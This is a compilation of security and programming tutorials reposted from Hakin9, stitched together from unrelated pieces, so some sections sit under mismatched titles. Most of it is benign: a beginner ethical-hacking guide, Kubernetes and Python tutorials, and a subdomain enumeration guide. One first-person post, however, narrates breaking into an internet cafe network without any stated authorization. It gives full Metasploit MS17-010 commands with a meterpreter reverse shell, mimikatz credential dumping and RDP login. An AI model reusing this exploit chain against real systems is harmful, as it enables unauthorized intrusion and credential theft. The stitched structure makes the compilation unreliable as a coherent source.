If you have no experience don’t worry. We ALL had to start somewhere, and we ALL needed help to get where we are today. No one is an island and no one is born with all the necessary skills. Period. OK, so you have zero experience and limited skills…my advice in this instance is that you teach yourself some absolute fundamentals.

Let’s get this party started.

1. What is hacking?

Hacking is identifying weakness and vulnerabilities of some system and gaining access with it.

Hacker gets unauthorized access by targeting system while ethical hacker have an official permission in a lawful and legitimate manner to assess the security posture of a target system(s).

There are some types of hackers, a bit of “terminology”.
White hat — ethical hacker.
Black hat — classical hacker, get unauthorized access.
Grey hat — a person who gets unauthorized access but reveals the weaknesses to the company.
Script kiddie — a person with no technical skills just used pre-made tools.
Hacktivist — a person who hacks for some idea and leaves some messages. For example strike against copyright.

Actually, a goal of ethical hacking is to reveal the system weaknesses and vulnerabilities for a company to fix them. Ethical hacker documents everything he did.

2. Skills required to become an ethical hacker.

First of all to be a pentester you need to be willing to continuously learn new things on the fly and or quickly at home. Secondly, you need to have a strong foundational understanding of at least one coding/scripting language as well as an understanding of network and web security.

So here are some steps if you want to start from now:

1. Learn To Code (Programming).
2. Understand basic concepts of Operating System
3. Fundamentals of Networking and Security
4. Markup and as many technologies as you can!

3. What platform to code in.

That depends on what platform you’ll be working on. For web applications, I suggest you learn HTML, PHP, JSP, and ASP. For mobile applications, try Java (Android), Swift (iOS), C# (Windows Phone). For desktop-based software try Java, C#, C++.

I would like to recommend Python as well because its a general purpose language and getting more popular nowadays due to its portability.

But what really is necessary for every programming language is to learn the fundamentals of programming, concepts like the data types, the variable manipulation throughout the program at the OS level to the use of subroutines aka functions and so on. If you learn these, it’s pretty much the same for every programming language except for some syntax changes.

ProTips:

1. To be an expert at any programming language, understand the OS level operations of that language (varies in different compilers) or learn assembly language to be more generalized
2. Don’t get your hopes high if you can’t achieve results in a short span of time. I prefer the “Miyagi” style of learning. So keep yourself motivated for what comes next.
3. Never underestimate the power of network and system administrators. They can make you their *hypothetical* slave in a corporate infosec environment

Resources to get started:

I would like to share some resources that I found best in learning from scratch.

There is a whole list of resources I have created for your help (https://github.com/husnainfareed/Resources-for-learning-ethical-hacking/ )

Another advice. Regularly follow http://h1.nobbd.de/ to be updated with HackerOne Public Bug reports. You can learn a lot from them. Follow https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

Alternatively, You can join slack community for hackers:

https://bugbounty-world.slack.com/

https://bugbountyforum.com/

Also you should consider practicing your skills on

http://www.itsecgames.com/

http://www.dvwa.co.uk/

http://www.vulnerablewebapps.org/

http://hackyourselffirst.troyhunt.com/

https://github.com/s4n7h0/xvwa

http://zero.webappsecurity.com/

http://crackme.cenzic.com/kelev/view/home.php

http://demo.testfire.net

https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

HackerOne Public Reports!

These Reports might help you guys to get some in-depth idea of BugBounty hunting…

HackerOne Public Reports.csv

Some of the points to be noted:

• By a Self-Learner: Why? Because without it you won’t learn from things you experience, you won’t be able to solve your problems.
• Educate your self on daily basis: read articles, write-ups, videos or slides to educate yourself
• Know your target, before proceeding make sure to know your target. Invest most of your time in identifying your target identifying the services the target uses.
• Map the target: get a better view of the target’s infrastructure in order to get a better understanding of what to target.
• Walk the path no one travels: Don’t be the common dude out there. Think out of the Box, think what the developer missed think what common guys are targeting, depending on that choose your path.
• Be a ninja: You need to be fast and precise as a Ninja. Know, Map, Target your victim precisely and quickly. This only works if you are good are talking the different path and if you are unique.

If you want to know more about Recon and how to chase Bug Bounty read this article “How To Do Your Reconnaissance Properly Before Chasing A Bug Bounty”.

Let”s hope you are not going to blacklist this post for the rest of your life. I have a lot of interesting stuff coming up. Ciao.

Originally posted: https://medium.com/@hussnainfareed/how-to-start-your-career-in-any-field-related-to-information-security-841adcf20901 

The post Beginners Guide | How To Become an Ethical Hacker by Hussnain Fareed appeared first on Hakin9 - IT Security Magazine.

Just got over with my final exams so, I thought why not write one article about the hack that I enjoyed the most. It’s an old hack that I carried out few months back but it is still very much relevant today on systems that are running legacy operating systems and are not regularly updated. This article is really close to me as this was the first time I was able to open a remote desktop client.

Introduction

So let me give you the outline of the hack, I got access to the network by breaking into the wifi access point and then leveraging the fact that they the system was vulnerable to smb attack ( CVE-2017–010 ), its port 445 was open. Then I used Metasploit to launch a reverse shell and gain control over the system, then I loaded mimikatz to get the login credentials and then used remote desktop client which gave me total access to the files and folders.

It’s easier said than done, let me show you how the whole thing was carried out.

Let’s dig in!

So, the hack began with me getting into their network via their wifi which was protected by a silly password, it was extremely common (123pass456), you can read here what method I used to carry that out -> hacking wifi.

Well, once I was on their network then I carried out basic nmap commands to have a better idea of the PCs, printers or phones that were connected to their network.

Once I obtained the IP address of all the systems present on their network then I used nmap to scan through each of them and then I came across this.

The hack!

I was particularly focused on the port 445. I straight away went for the scripts that are provided by nmap by default.

root@kali:~#cd /usr/share/nmap/scripts/

Once, I was in the scripts folder I did a search for the smb vulnerabilities.

root@kali:~#ls *smb*

I was presented with the above image, looking through them I went on to use the smb-vuln-ms17–010.nse. To utilise that I had to use this command:

root@kali:~#nmap -p 135,136,445 --script=smb-vuln-ms-17–010.nse 10.1.32.17 -v

I was presented with the following output. As you can see the risk factor is high, so my morales went sky high as I was sure that now the attack is definitely gonna through. The point of attacking the machine further was to figure out how much access can I get using this vulnerability.

I straight away opened up metaspolit, and typed in the following commands

msf>use exploit/windows/smb/ms17_010_psexec

This is the first command that I used to begin the exploit on the metasploit.

msf exploit(windows/smb/ms17_010_psexec)>set payload windows/meterpreter/reverse_tcp

This command is used to specify the exploit that I want to use, which is based on this vulnerability.

msf exploit(windows/smb/ms17_010_psexec)>set LHOST 10.1.37.143

msf exploit(windows/smb/ms17_010_psexec)>set RHOST 10.1.32.17

In the above commands I specify the LHOST and the RHOST. The LHOST IP is the ip address of the person carrying out the attack whereas the RHOST IP os the ip address of the person on whom the attack os being carried out.

msf exploit(windows/smb/ms17_010_psexec)>exploit

Once, the attack vectors were filled, I started the exploit.

Then there it was, the meterpreter shell. Now, even the basic person interested in hacking knows that as soon as I had this I had near full control of the system.

So, now comes the time where I started working on the rdp client. To carry that out I entered the following commands.

meterpreter>load mimikatz

Mimikatz is an open-source utility that enables the viewing of credential information from the Windows lsass (Local Security Authority Subsystem Service) through its sekurlsa module which includes plaintext passwords

meterpreter>kerberos

I carried out this to figure out the username and the password of the victim’s system.

Now, as soon as I got the credentials. I opened up a new terminal and began the remote desktop client to try and remote login in the system.

root@kali~:rdesktop 10.1.32.17

This initiated the remote desktop client, I entered the login credentials and boom!

This gave me complete access to the system as I was able to manipulate anything and everything beyond this point.

Moral

This is an incredible attack scenario as in most of the reverse_tcp meterpreter shell you need the user to have some kind of interaction or the program need to be run in the system whereas this particular vulnerability didn’t require that as so the best way to protect yourself from such attacks is to keep your system OS updated at all times.

Twitter : twitter.com/aditya12anand

LinkedIn : linkedin.com/in/aditya12anand/

E-mail : aditya12anand@protonmail.com

P.S. The images used in the article are not from my attack but from a friend of mine who carried out the same attack on a different system. The images have been used with the permission of the owner.

You can watch the video he published here > https://bit.ly/2r3jszO

Originally posted: https://medium.com/bugbountywriteup/how-i-hacked-into-an-internet-cafe-4140cc4103d8

The post How I hacked into an internet cafe? by Aditya Anand appeared first on Hakin9 - IT Security Magazine.

apt-get update && apt-get install obfs4proxy

sudo mkdir -p /var/lib/tor/pt_state/obfs4

sudo nano /var/lib/tor/pt_state/obfs4/obfs4.config

TOR_PT_MANAGED_TRANSPORT_VER=1
TOR_PT_STATE_LOCATION=/var/lib/tor/pt_state/obfs4
TOR_PT_SERVER_TRANSPORTS=obfs4
TOR_PT_SERVER_BINDADDR=obfs4-0.0.0.0:444
TOR_PT_ORPORT=127.0.0.1:443

sudo nano /etc/systemd/system/obfs4proxy.service

[Unit]
Description=Obfsproxy Server

[Service]
EnvironmentFile=/var/lib/tor/pt_state/obfs4/obfs4.config
ExecStart=/usr/bin/obfs4proxy -enableLogging true -logLevelStr INFO

[Install]
WantedBy=multi-user.target

sudo systemctl start obfs4proxy
sudo systemctl enable obfs4proxy

cat /var/lib/tor/pt_state/obfs4/obfs4_bridgeline.txt

The post How to run your own OpenVPN server on a Raspberry Pi by Denis Nuțiu appeared first on Hakin9 - IT Security Magazine.

$ minikube start

Starting local Kubernetes v1.10.0 cluster...
Starting VM...
Getting VM IP address...
Moving files into cluster...
Setting up certs...
Connecting to cluster...
Setting up kubeconfig...
Starting cluster components...
Kubectl is now configured to use the cluster.
Loading cached images from config file.

$ kubectl version

Client Version: version.Info{Major:"1", Minor:"9", GitVersion:"v1.9.1", GitCommit:"3a1c9449a956b6026f075fa3134ff92f7d55f812", GitTreeState:"clean", BuildDate:"2018-01-04T20:00:41Z", GoVersion:"go1.9.2", Compiler:"gc", Platform:"darwin/amd64"}
Server Version: version.Info{Major:"1", Minor:"10", GitVersion:"v1.10.0", GitCommit:"fc32d2f3698e36b93322a3465f63a14e9f0eaead", GitTreeState:"clean", BuildDate:"2018-03-26T16:44:10Z", GoVersion:"go1.9.3", Compiler:"gc", Platform:"linux/amd64"}

apiVersion: v1
kind: Service
metadata:
  name: result
spec:
  type: NodePort
  ports:
  - name: "result-service"
    port: 5001
    targetPort: 80
    nodePort: 31001
  selector:
    app: result

apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: result
spec:
  replicas: 1
  template:
    metadata:
      labels:
        app: result
    spec:
      containers:
      - image: dockersamples/examplevotingapp_result:before
        name: result

$ kubectl create -f k8s-specifications/

deployment "db" created
service "db" created
deployment "redis" created
service "redis" created
deployment "result" created
service "result" created
deployment "vote" created
service "vote" created
deployment "worker" created

$ kubectl get pods

NAME                      READY     STATUS    RESTARTS   AGE
db-86b99d968f-s5pv7       1/1       Running   0          1m
redis-659469b86b-hrxqs    1/1       Running   0          1m
result-59f4f867b8-cthvc   1/1       Running   0          1m
vote-54f5f76b95-zgwrm     1/1       Running   0          1m
worker-56578c48f8-h7zvs   1/1       Running   0          1m

$ kubectl get svc

NAME         TYPE        CLUSTER-IP       EXTERNAL-IP   PORT(S)          AGE
db           ClusterIP   10.109.241.59    <none>        5432/TCP         2m
kubernetes   ClusterIP   10.96.0.1        <none>        443/TCP          23m
redis        ClusterIP   10.102.242.148   <none>        6379/TCP         2m
result       NodePort    10.106.7.255     <none>        5001:31001/TCP   2m
vote         NodePort    10.103.28.96     <none>        5000:31000/TCP   2m

# Start Minikube server
$ minikube start

# Get the Minikube IP
$ minikube ip

$ kubectl version             #Get kubectl version
$ kubectl cluster-info        #Get cluster info

$ kubectl create -f ./file.yml
$ kubectl create -f ./file1.yml -f ./file2.yaml
$ kubectl create -f ./dir
$ kubectl create -f http://www.fpaste.org/279276/48569091/raw/

# List all services in the namespace
$ kubectl get services

# List all pods in all namespaces
$ kubectl get pods --all-namespaces

# List all pods in the namespace, with more details   
$ kubectl get pods -o wide

# List a particular replication controller
$ kubectl get rc <rc-name>

# List all pods with a label env=production
$ kubectl get pods -l env=production

$ kubectl get services --sort-by=.metadata.name

$ kubectl label pods <pod-name> new-label=awesome
$ kubectl annotate pods <pod-name> icon-url=http://goo.gl/XXBTWq
$ kubectl delete pod pingredis-XXXXX

$ kubectl scale --replicas=3 deployment nginx

$ kubectl logs <pod-name>

# Runs a tailf log output
$ kubectl logs -f <pod-name>

# Run pod as interactive shell
$ kubectl run -i --tty busybox --image=busybox -- sh

# Attach to Running Container
$ kubectl attach <podname> -i

# Forward port of Pod to your local machine
$ kubectl port-forward <podname> <local-and-remote-port>

# Forward port to service
$ kubectl port-forward <servicename> <port>

# Run command in existing pod (1 container case)
$ kubectl exec <pod-name> -- ls /

# Run command in existing pod (multi-container case)
$ kubectl exec <pod-name> -c <container-name> -- ls /

$ kubectl exec busybox -- nslookup kubernetes
$ kubectl exec busybox -- nslookup kubernetes.default
$ kubectl exec busybox -- nslookup kubernetes.default.svc.cluster.local

$ kubectl run nginx --image=nginx:1.9.12
$ kubectl expose deployment nginx --port=80 --type=LoadBalancer

The post A friendly introduction to Kubernetes by Faizan Bashir appeared first on Hakin9 - IT Security Magazine.

As a penetration tester or a bug bounty hunter, most of the times you are given a single domain or a set of domains when you start a security assessment. You’ll have to perform extensive reconnaissance to find interesting assets like servers, web applications, domains that belong to the target organisation so that you can increase your chances of finding vulnerabilities.

We wrote an extensive blog post on Open Source Intelligence Gathering techniques that are typically used in the reconnaissance phase.

Sub-domain enumeration is an essential part of the reconnaissance phase. This blog post covers various sub-domain enumeration techniques in a crisp and concise manner.

A gitbook will be released as a follow up for this blog post on the same topic where we cover these techniques in-depth. We covered some of these techniques in the “Esoteric sub-domain enumeration techniques” talk given at Bugcrowd LevelUp conference 2017.

We released a gitbook that covers many more techniques in addition to what is covered in this blog post. The gitbook is available here: https://appsecco.com/books/subdomain-enumeration/

What is sub-domain enumeration?

Sub-domain enumeration is the process of finding sub-domains for one or more domain(s). It is an essential part of the reconnaissance phase.

Why sub-domain enumeration?

• Sub-domain enumeration can reveal a lot of domains/sub-domains that are in scope of a security assessment which in turn increases the chances of finding vulnerabilities
• Finding applications running on hidden, forgotten sub-domains may lead to uncovering critical vulnerabilities
• Often times the same vulnerabilities tend to be present across different domains/applications of the same organisation

The famous Yahoo! Voices hack happened due to a vulnerable application deployed on a yahoo.com sub-domain

Sub-domain enumeration techniques

1. Search engines like Google and Bing supports various advanced search operators to refine search queries. These operators are often referred to as “Google dorks”.

• We can use “site:” operator in Google search to find all the sub-domains that Google has found for a domain. Google also supports additional minus operator to exclude sub-domains that we are not interested in “site:*.wikimedia.org -www -store -jobs -uk”

Using site operator in Google search to find sub-domains

• Bing search engine supports some advanced search operators as well. Like Google, Bing also supports a “site:” operator that you might want to check for any additional results apart from the Google search

Finding sub-domains using “site:” operator in Bing

2. There are a lot of the third party services that aggregate massive DNS datasets and look through them to retrieve sub-domains for a given domain.

• VirusTotal runs its own passive DNS replication service, built by storing DNS resolutions performed when visiting URLs submitted by users. In order to retrieve the information of a domain you just have to put domain name in the search bar

Searching for sub-domains using virustotal

sub-domains found using VirusTotal

• DNSdumpster is another interesting tools that can find potentially large number of sub-domains for a given domain

Searching for sub-domains using DNSdumpster

Sublist3r is a popular tool that’ll enumerate sub-domains using various sources. Sublist3r enumerates sub-domains using many search engines such as Google, Yahoo, Bing, Baidu, and Ask. Sublist3r also enumerates sub-domains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster, and ReverseDNS.

sub-domain enumeration using Sublist3r

3. Certificate Transparency(CT) is a project under which a Certificate Authority(CA) has to publish every SSL/TLS certificate they issue to a public log. An SSL/TLS certificate usually contains domain names, sub-domain names and email addresses. This makes them a treasure trove of information for attackers. I wrote a series of technical blog posts on Certificate Transparency where I covered this technique in-depth, you can read the series here.

The easiest way to lookup certificates issued for a domain is to use search engines that collect the CT logs and let’s anyone search through them. Few of the popular ones are listed below –

1. https://crt.sh/
2. https://censys.io/
3. https://developers.facebook.com/tools/ct/
4. https://google.com/transparencyreport/https/ct/

Finding sub-domains of an organisation’s primary domain using crt.sh

Additional to the web interface, crt.sh also provides access to their CT logs data using postgres interface. This makes it easy and flexible to run some advanced queries. If you have the PostgreSQL client software installed, you can login as follows:

$ psql -h crt.sh -p 5432 -U guest certwatch

We wrote few scripts to simplify the process of finding sub-domains using CT log search engines. The scripts are available in our github repo — https://github.com/appsecco/the-art-of-subdomain-enumeration

Interesting sub-domain entry from CT logs for uber.com

The downside of using CT for sub-domain enumeration is that the domain names found in the CT logs may not exist anymore and thus they can’t be resolved to an IP address. You can use tools like massdns in conjunction with CT logs to quickly identify resolvable domain names.

 

# ct.py - extracts domain names from CT Logs(shipped with massdns)
# massdns - will find resolvable domains & adds them to a file 

./ct.py icann.org | ./bin/massdns -r resolvers.txt -t A -q -a -o -w 
icann_resolvable_domains.txt -

Using massdns to find resolvable domain names

4.Dictionary based enumeration is another technique to find sub-domains with generic names. DNSRecon is a powerful DNS enumeration tool, one of it’s feature is to conduct dictionary based sub-domain enumeration using a pre-defined wordlist.

$ python dnsrecon.py -n ns1.insecuredns.com -d insecuredns.com -D 
subdomains-top1mil-5000.txt -t brt

Dictionary based enumeration using DNSRecon

5.Permutation scanning is another interesting technique to identify sub-domains. In this technique, we identify new sub-domains using permutations, alterations and mutations of already known domains/sub-domains.

• Altdns is a tool that allows for the discovery of sub-domains that conform to patterns

$ python altdns.py -i icann.domains -o data_output -w icann.words -r 
-s results_output.txt

Finding sub-domains that match certain permutations/alterations using AltDNS

6.Finding Autonomous System (AS) Numbers will help us identify netblocks belonging to an organization which in-turn may have valid domains.

• Resolve the IP address of a given domain using dig or host
• There are tools to find ASN given an IP address — https://asn.cymru.com/cgi-bin/whois.cgi
• There are tools to find ASN given a domain name — http://bgp.he.net/

Finding AS Number using IP address

• The ASN numbers found can be used to find netblocks of the domain. There are Nmap scripts to achieve that — https://nmap.org/nsedoc/scripts/targets-asn.html

$ nmap --script targets-asn --script-args targets-asn.asn=17012 > 
netblocks.txt

Finding netblocks using AS numbers — NSE script

7. Zone transfer is a type of DNS transaction where a DNS server passes a copy of full or part of it’s zone file to another DNS server. If zone transfers are not securely configured, anyone can initiate a zone transfer against a nameserver and get a copy of the zone file. By design, zone file contains a lot of information about the zone and the hosts that reside in the zone.

$ dig +multi AXFR @ns1.insecuredns.com insecuredns.com

Successful zone transfer using DIG tool against a nameserver for a domain

8. Due to the way non-existent domains are handled in DNSSEC, it is possible to “walk” the DNSSEC zones and enumerate all the domains in that zone. You can learn more about this technique from here.

• For DNSSEC zones that use NSEC records, zone walking can be performed using tools like ldns-walk

$ ldns-walk @ns1.insecuredns.com insecuredns.com

Zone walking DNSSEC zone with NSEC records

• Some DNSSEC zones use NSEC3 records which uses hashed domain names to prevent attackers from gathering the plain text domain names. An attacker can collect all the sub-domain hashes and crack the hashes offline
• Tools like nsec3walker, nsec3map help us automate the collecting NSEC3 hashes and cracking the hashes. Once you install nsec3walker, you can use the following commands to enumerate sub-domains of NSEC3 protected zone

# Collect NSEC3 hashes of a domain
$ ./collect icann.org > icann.org.collect

# Undo the hashing, expose the sub-domain information.
$ ./unhash < icann.org.collect > icann.org.unhash

# Listing only the sub-domain part from the unhashed data
$ cat icann.org.unhash | grep "icann" | awk '{print $2;}'
del.icann.org.
access.icann.org.
charts.icann.org.
communications.icann.org.
fellowship.icann.org.
files.icann.org.
forms.icann.org.
mail.icann.org.
maintenance.icann.org.
new.icann.org.
public.icann.org.
research.icann.org.

9. There are projects that gather Internet wide scan data and make it available to researchers and the security community. The datasets published by this projects are a treasure trove of sub-domain information. Although finding sub-domains in this massive datasets is like finding a needle in the haystack, it is worth the effort.

• Forward DNS dataset is published as part of Project Sonar. This data is created by extracting domain names from a number of sources and then sending an ANY query for each domain. The data format is a gzip-compressed JSON file. We can parse the dataset to find sub-domains for a given domain. The dataset is massive though(20+GB compressed, 300+GB uncompressed)

Enumerating domains/subdomains using FDNS dataset

Sub-domain enumeration techniques — A comparison

We ran few of the discussed techniques against icann.org and compared the results. The bar chart below shows the number of unique, resolvable sub-domains each technique found for icann.org. Feel free to get in touch with us to know the methods we used to gather this information.

Number of unique, resolvable sub-domains each technique found for icann.org

Sub-domain enumeration — Reference

We created a simple reference for sub-domain enumeration techniques, tools and sources. This reference is created using a Github gist, feel free to fork, customise it— https://gist.github.com/yamakira/2a36d3ae077558ac446e4a89143c69ab

References

• https://github.com/appsecco/bugcrowd-levelup-subdomain-enumeration
• https://blog.appsecco.com/open-source-intelligence-gathering-101-d2861d4429e3
• https://www.databreaches.net/hackers-post-450k-credentials-apparently-pilfered-from-yahoo/
• http://info.menandmice.com/blog/bid/73645/Take-your-DNSSEC-with-a-grain-of-salt
• https://www.peerlyst.com/posts/bsideslv-2017-breaking-ground-with-underflow-bsides-las-vegas

At Appsecco we provide advice, testing, training and insight around software and website security, especially anything that’s online, and its associated hosting infrastructure — Websites, e-commerce sites, online platforms, mobile technology, web-based services etc.

If something is accessible from the internet or a person’s computer we can help make sure it is safe and secure

Originally posted: https://blog.appsecco.com/a-penetration-testers-guide-to-sub-domain-enumeration-7d842d5570f6

The post A penetration tester’s guide to subdomain enumeration by Bharath Kumar appeared first on Hakin9 - IT Security Magazine.

Once you start using Python, there is no escaping from this word “self”. It is seen in method definitions and in variable initialization. But getting the idea behind it seems somewhat troublesome. Hopefully, at the end of this, you will get an intuitive idea of what “self” is and where you should use it.

But before talking about the self keyword (which is actually not a python keyword or any special literal), first, let’s recall what are class variables and instance variables. Class variables are variables that are being shared with all instances (objects) which were created using that particular class. So when accessed a class variable from any instance, the value will be the same. Instance variables, on the other hand, are variables which all instances keep for themselves (i.e a particular object owns its instance variables). So typically values of instance variables differ from instance to instance.

Class variables in python are defined just after the class definition and outside of any methods:

class SomeClass:    
    variable_1 = “ This is a class variable”    
    variable_2 = 100   #this is also a class variable

Unlike class variables, instance variables should be defined within methods:

class SomeClass:    
    variable_1 = “ This is a class variable”    
    variable_2 = 100    #this is also a class variable.    

    def __init__(self, param1, param2):        
        self.instance_var1 = param1        
        #instance_var1 is a instance variable	
        self.instance_var2 = param2           
        #instance_var2 is a instance variable

Let’s instantiate above class and do some introspections about those instances and above class:

>>> obj1 = SomeClass("some thing", 18) 
#creating instance of SomeClass named obj1
>>> obj2 = SomeClass(28, 6) 
#creating a instance of SomeClass named obj2

>>> obj1.variable_1
'a class variable'

>>> obj2.variable_1
'a class variable'

So as seen above, both obj1 and obj2 gives the same value when variable_1 is accessed, which is the normal behavior that we should expect from a class variable. Let’s find about instance variables:

>> obj1.instance_var1
'some thing'
>>> obj2.instance_var1
28

So the expected behavior of instance variables can be seen above without any error. That is, both obj1 and obj2 have two different instance variables for themselves.

Instance and class methods in python

Just as there are instance and class variables, there are instance and class methods. These are intended to set or get status of the relevant class or instance. So the purpose of the class methods is to set or get the details (status) of the class. Purpose of instance methods is to set or get details about instances (objects). Being said that, let’s see how to create instance and class methods in python.

When defining an instance method, the first parameter of the method should always be self. Why it should always be “self” is discussed in the next section (which is the main aim of this post). However one can name it anything other than self, but what that parameter represents will always be the same. And it’s a good idea for sticking with self as it’s the convention.

class SomeClass: 
    def create_arr(self): # An instance method 
        self.arr = []

    def insert_to_arr(self, value): #An instance method 
        self.arr.append(value)

We can instantiate above class as obj3, and do some investigations as follows:

>>> obj3 = SomeClass()
>>> obj3.create_arr()
>>> obj3.insert_to_arr(5)
>>> obj3.arr
[5]

So as you can notice from above, although when defining an instance method the first parameter is self, when calling that method, we do not pass anything for self as arguments. How come this does not give errors? What’s going on behind the scene? These are explained in the next section.

Ok, with instance methods explained, all we have left is class methods ( — so I say). Just like instance methods, in class methods also there is a special parameter that should be placed as the first parameter. It is the cls parameter, which represents the class:

class SomeClass: 
    def create_arr(self): # An instance method 
        self.arr = [] 

    def insert_to_arr(self, value): #An instance method 
        self.arr.append(value) 

    @classmethod 
    def class_method(cls): 
        print("the class method was called")

Without even instantiating an object, we can access class methods as follows:

SomeClass.class_method()

So all we have to call the class method with the name of the class. And in here also just like instance methods, although there is a parameter defined as cls, we do not pass any argument when calling the method — explained next.

Note: Python has another type of methods known as static methods. These are normal methods which do not have any special parameter as with instance methods or class methods. Therefore these static methods can neither modify object state nor class state.

Now with all things are being reminded (instance/class variables and methods), let’s talk about the use of self in python ( — finally).

self — intuition

Some of you may have got it by now, or some may have got it partially; anyway, the self in python represents or points the instance which it was called. Let’s clarify this with an example:

class SomeClass:    
    def __init__(self):        
        self.arr = []         
        #All SomeClass objects will have an array arr by default       
 
    def insert_to_arr(self, value):        
        self.arr.append(value)

So now let’s create two objects of SomeClass and append some values for their arrays:

obj1 = SomeClass()
obj2 = SomeClass()
obj1.insert_to_arr(6)

Important: Unlike some other languages, when a new object is created in python, it does not create a new set of instance methods to itself. So instance methods lie within the class object without being created with each object initialization — nice way to save up memory. Recall that python is a fully object oriented language and so a class is also an object. So it lives within the memory.

Being said that, let’s look at the above example. There we have created obj1and are calling the instance method insert_to_arr() of SomeClass while passing an argument 6. But now how does that method know “which object is calling me and whose instance attributes should be updated”. Here, to whose arr array should I append the value 6? Ok, now I think you got it. That’s the job of self. Behind the scene, in every instance method call, python sends the instance also with that method call. So what actually happens is, python convert the above calling of the instance method to something like below:

SomeClass.inseart_to_arr(obj1, 6)

Now you know why you should always use self as the first parameter of instance methods in python and what really happens behind the scene when we call an instance method. — Happy Coding !!

Originally posted: https://medium.com/quick-code/understanding-self-in-python-a3704319e5f0

The post Understanding self in Python by Ashan Priyadarshana appeared first on Hakin9 - IT Security Magazine.

$ pip3 install lore
$ git clone https://github.com/montanalow/my_app.git
$ cd my_app 
$ lore install # caching all dependencies locally takes a few minutes the first time
$ lore server & 
$ curl "http://localhost:5000/product_popularity.Keras/predict.json?product_name=Banana&department=produce"

$ pip3 install lore
$ git clone https://github.com/montanalow/my_app.git
$ cd my_app 
$ lore install # caching all dependencies locally takes a few minutes the first time
$ lore server & 
$ curl "http://localhost:5000/product_popularity.Keras/predict.json?product_name=Banana&department=produce"

$ lore init my_app --python-version=3.6.4 --keras

$ cd my_app
$ lore generate scaffold product_popularity --keras --regression --holdout

# my_app/pipelines/product_popularity.py part 1

import os

from lore.encoders import Token, Unique, Norm
import lore.io
import lore.pipelines.holdout
import lore.env

import pandas


class Holdout(lore.pipelines.holdout.Base):
    # You can inspect the source data csv's yourself from the command line with:
    # $ wget https://s3.amazonaws.com/instacart-datasets/instacart_online_grocery_shopping_2017_05_01.tar.gz
    # $ tar -xzvf instacart_online_grocery_shopping_2017_05_01.tar.gz

    def get_data(self):
        url = 'https://s3.amazonaws.com/instacart-datasets/instacart_online_grocery_shopping_2017_05_01.tar.gz'

        # Lore will extract and cache files in lore.env.DATA_DIR by default
        lore.io.download(url, cache=True, extract=True)
        
        # Defined to DRY up paths to 3rd party file hierarchy
        def read_csv(name):
            path = os.path.join(
                lore.env.DATA_DIR,
                'instacart_2017_05_01',
                name + '.csv')
            return pandas.read_csv(path, encoding='utf8')
        
        # Published order data was split into irrelevant prior/train
        # sets, so we will combine them to re-purpose all the data.
        orders = read_csv('order_products__prior')
        orders = orders.append(read_csv('order_products__train'))

        # count how many times each product_id was ordered
        data = orders.groupby('product_id').size().to_frame('sales')

        # add product names and department ids to ordered product ids
        products = read_csv('products').set_index('product_id')
        data = data.join(products)

        # add department names to the department ids
        departments = read_csv('departments').set_index('department_id')
        data = data.set_index('department_id').join(departments)
        
        # Only return the columns we need for training
        data = data.reset_index()
        return data[['product_name', 'department', 'sales']]

# my_app/pipelines/product_popularity.py part 2

    def get_encoders(self):
        return (
            # An encoder to tokenize product names into max 15 tokens that
            # occur in the corpus at least 10 times. We also want the 
            # estimator to spend 5x as many resources on name vs department
            # since there are so many more words in english than there are
            # grocery store departments.
            Token('product_name', sequence_length=15, minimum_occurrences=10, embed_scale=5),
            # An encoder to translate department names into unique
            # identifiers that occur at least 50 times
            Unique('department', minimum_occurrences=50)
        )

    def get_output_encoder(self):
        # Sales is floating point which we could Pass encode directly to the
        # estimator, but Norm will bring it to small values around 0,
        # which are more amenable to deep learning.
        return Norm('sales')

# my_app/estimators/product_popularity.py

import lore.estimators.keras


class Keras(lore.estimators.keras.Regression):
    pass

# my_app/models/product_popularity.py

import lore.models.keras

import my_app.pipelines.product_popularity
import my_app.estimators.product_popularity


class Keras(lore.models.keras.Base):
    def __init__(self, pipeline=None, estimator=None):
        super(Keras, self).__init__(
            my_app.pipelines.product_popularity.Holdout(),
            my_app.estimators.product_popularity.Keras(
                hidden_layers=2,
                embed_size=4,
                hidden_width=256,
                batch_size=1024,
                sequence_embedding='lstm',
            )
        )

$ lore test tests.unit.test_product_popularity

$ lore fit my_app.models.product_popularity.Keras --test --score

$ tail -f logs/development.log

$ lore notebook

$ lore server &
$ curl "http://localhost:5000/product_popularity.Keras/predict.json?product_name=Banana&department=produce"
$ curl "http://localhost:5000/product_popularity.Keras/predict.json?product_name=Organic%20Banana&department=produce"
$ curl "http://localhost:5000/product_popularity.Keras/predict.json?product_name=Green%20Banana&department=produce"
$ curl "http://localhost:5000/product_popularity.Keras/predict.json?product_name=Brown%20Banana&department=produce"

$ git init .
$ git add .
$ git add -f models/my_app.models.product_popularity/Keras/1 # or your preferred fitting number to deploy
$ git commit -m "My first lore app!"

$ heroku login
$ heroku create
$ heroku config:set LORE_PROJECT=my_app
$ heroku config:set LORE_ENV=production
$ git push heroku master
$ heroku open

$ curl “`heroku info -s | grep web_url | cut -d= -f2`product_popularity.Keras/predict.json?product_name=Banana&department=produce”

The post How to build a deep learning model in 15 minutes by Montana Low appeared first on Hakin9 - IT Security Magazine.

Hello friends!

I want to talk a little about what has got me started on reviving my technology skills and started me on this journey. As a lifetime linux aficionado, I’ve been aware of the hacker sub-culture almost my whole life. It’s quite interesting to see how it has morphed and changed with technology. And what recently has gotten me hooked and excited about brushing up my dated computer skills is bug bounty hunting.

What is bug bounty hunting?

A bug bounty program is a deal offered by many websites and developers by which individuals can receive recognition and compensation for bugs, especially those pertaining to exploits and vulnerabilities- WikiPedia

As every aspect of our lives and how we do business is continually pushed online, it doesn’t take a rocket scientist to see that the need for security researchers will continue to grow. Code that is properly written and secure ensures sensitive data remains protected. And this benefits everybody. Which is why I decided to write this blog post, documenting the way to learn how to jump into this wild and crazy world of bug hunters. Are you ready? Hang on to your seat, it’s gonna be a crazy ride!

Report Triaged!!!

While the resources for how to become a bug bounty hunter are numerous and vast. They are spread out and the information can be hard to differentiate between what a newbie needs to learn now and what can be learned in the future. Hopefully this blog post alleviates some of that problem. I’m not going to dive into the detail by detail how-to of the matter, that’s for you and the resources to do later. This is just the roadmap, so to speak. I’m not gonna barrage you with a million resources either. Those lists are what I’m trying to help demystify. Here you will find the bare bones basics of what to use in your quest to become a bug bounty hunter.

Books

What? Really books in this day and age? Is he kidding? No I’m not. You can get the online version if your allergic to paper. ;)

